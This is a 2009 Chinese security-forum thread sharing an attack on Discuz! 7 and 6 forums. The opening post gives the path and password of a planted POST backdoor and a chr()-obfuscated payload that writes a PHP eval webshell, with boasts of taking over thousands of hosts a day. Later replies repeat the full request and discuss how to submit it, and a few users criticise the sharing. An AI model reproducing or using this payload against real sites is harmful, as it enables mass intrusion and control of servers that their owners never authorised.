论坛 › 网络安全 › Discuz! 7 0DAY攻击。

mirk 发表于 2009-8-22 21:48

Discuz! 7 0DAY攻击。

前几天一直不敢公布，由于破坏性很大。不乏有人写会利用写病毒。
目前一般的大站都已经采取措施了，所以那些小站就暂时不管了。测试了一下，发帖钱1分钟弄10台肉鸡不算什么。运气好的话.....一天1W台肉鸡（保守的说）


书说简短：
扫描
/forumdata/cache/usergroup_0.php   （扫描方法依个人习惯）


直接POST方式提交数据，因为以上.PHP就是一个一POST提交的后门，提交需要密码。这里公布下密码：“456656767”（符号里面的数字）。

直接POST方式提交后门：我这里用的是代码 ：b=456656767&a=fputs(fopen(chr(46).chr(47).chr(115).chr(116).chr(121).chr(108).chr(101).chr(95).chr(48).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62));以上代码会在同目录下生成一个style_0.php文件，这个文件是一句话后门。

写到这里就应该结束了，直接用PHP一句话后门客户端连接就可以，当然了，也可以上传自己惯用的SHELL。

ymcyyf 发表于 2009-8-23 16:19

小站都是用的DZ6.......

Conners 发表于 2009-8-23 17:20

怕怕，幸好用的是phpwind

党桂y 发表于 2009-8-23 17:51

19770310 发表于 2009-8-23 18:25

我测试无效，可能方法有问题，可以给出全的post吗是不是
forumdata/cache/usergroup_0.php?b=456656767&a=fputs(fopen(chr(46).chr(47).chr(115).chr(116).chr(121).chr(108).chr(101).chr(95).chr(48).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62));

mirk 发表于 2009-8-24 01:49

我给你的就是全的。这样的。目标是 http://www.XXX.com/forumdata/cache/usergroup_0.php

包内容：

01.b=456656767&a=fputs(fopen(chr(46).chr(47).chr(115).chr(116).chr(121).chr(108).chr(101).chr(95).chr(48).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62));

这是提交一个后门，当然了，你也可以生成你自己惯用的WEBSHELL

mirk 发表于 2009-8-24 02:21

DZ6版本同样通用。

19770310 发表于 2009-8-24 14:33

用什么工具进行提交？我知道b是密码 a是后门，就是不知道用什么吧数据提交上去。保存为txt用php提交吗？

pluto 发表于 2009-8-24 15:18

是挂马者的福音，建议楼主还是设置下本帖的阅读权限：）

老子就是发帖器 发表于 2009-8-25 22:07

楼主不厚道....诲淫诲盗

鉴定完毕

mirk 发表于 2009-8-26 10:32

{:1_283:}我没说是我挖掘的呀，但总要有点共享精神嘛，是是官方升级服务器被域名劫持导致的，但总要工作出来让大家提防嘛

19770310 发表于 2009-8-27 14:30

支持你的共享

老子就日发帖器 发表于 2009-8-27 16:00

楼主不厚道....诲淫诲盗

鉴定完毕
老子就是发帖器 发表于 2009-8-25 22:07 http://bbs.antiy.cn/images/common/back.gif

{:1_283:}我没说是我挖掘的呀，但总要有点共享精神嘛，是是官方升级服务器被域名劫持导致的，但总要工作出来让大家提防嘛
mirk 发表于 2009-8-26 10:32 http://bbs.antiy.cn/images/common/back.gif

楼主和这种脑子不好的解释什么啊，应该直接封丫ID

原号忘记了 发表于 2009-8-28 16:16

楼主阅读权限，貌似没作用，我刚才发现我没登陆就进来了！

19770310 发表于 2009-9-1 15:54

知道了，简单的东西，在一句话客户端加一个input就行了哈哈哈
找一个usergroup_0.php一看就明白了，原来网上提供的usergroup_0.php是完整一句话代码没别的东西，想复杂了！

查看完整版本: Discuz! 7 0DAY攻击。